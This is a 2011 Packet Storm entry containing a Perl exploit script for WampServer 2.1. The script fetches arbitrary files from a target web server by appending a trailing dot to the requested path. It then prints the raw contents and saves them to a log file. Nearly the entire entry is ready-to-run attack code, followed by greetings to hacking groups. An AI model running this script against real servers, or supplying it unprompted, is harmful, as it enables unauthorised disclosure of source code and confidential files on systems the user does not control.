Wamp Webserver 2.1 File Download

2011-04-07T00:00:00
ID PACKETSTORM:100155
Type packetstorm
Reporter KedAns-Dz
Modified 2011-04-07T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
# ********* In The name of Allah ************  
###  
# Title : WampServer 2.1 Remote File Download Exploit  
# Author : KedAns-Dz  
# E-mail : ked-h@hotmail.com  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Twitter page : twitter.com/kedans  
# platform : php  
# Impact : Remote Content/Download File  
# Tested on : Windows XP SP3 Français  
# Target : EasyPHP 5.3.5.0  
###  
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )  
# ------------  
# Wamp Web server 2.1 is vulnerable for a Remote File Download attcak, the following code will exploit the bug.  
# The vulnerability allows an unprivileged attacker to download files whom he has no permissions to.  
# ------------  
# ********* In The name of Allah ************  
system("title KedAns-Dz");  
system("color 1e");  
system("cls");  
sleep(1);  
# Start Exploit : ** Allah Akbar **  
use LWP::Simple;  
if (@ARGV < 3) {  
print("\r\n");  
print("=================================================================\r\n");  
print(" [*] Wamp Web Server 2.1 Remote File Download Exploit\r\n");  
print(" [*] Discovered & Exploited by : KedAns-Dz\r\n");  
print("=================================================================\r\n");  
print(" [!] Usage: " .$0. " <host> <port> <file>\r\n");  
print(" [!] HOST - An host using Wamp Web Server 2.1\r\n");  
print(" [!] PORT - Port number\r\n");  
print(" [!] FILE - The file you want to get\r\n");  
print(" [!] Example: " .$0. " targetserver.com 80 index.php\r\n");  
print("=================================================================\r\n\r\n");  
sleep(1);  
exit(1);  
# ** Allah Akbar **  
} else {  
print("=================================================================\n");  
print(" [*] Wamp Web Server 2.1 Remote File Download Exploit\r\n");  
print(" [*] Discovered & Exploited by : KedAns-Dz\r\n");  
print("=================================================================\r\n\r\n");  
sleep(2);  
($host, $port, $file) = @ARGV;  
$content = get("http://" .$host. ":" .$port. "/" .$file. ".");  
print(" [+] File Content:\r\n\r\n");  
sleep(2);  
print($content. "\r\n");  
open (KDZ ,">","KedAns.log");  
print KDZ "Log File Exploited By KedAns-Dz <ked-h(at)hotmail(dot)com>\r\n" .  
"Greets All Hackers Moslems & All My Friends \r\n" .  
"Target : http://$host:$port/$file \r\n" .  
"File Content : \n\n" .  
"=============================\r\n\n" .  
"$content";  
print("\r\n");  
print("=================================================================\n");  
print "\n[+++] Creating And Download the Target File Content in KedAns.log \n";  
}  
# ** In The Peace of Allah **  
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================   
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >  
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz  
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz  
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)  
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{  
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX  
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,  
# www.packetstormsecurity.org * bugsearch.net * 1337day.com * exploit-id.com  
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...  
#================================================================================================   
`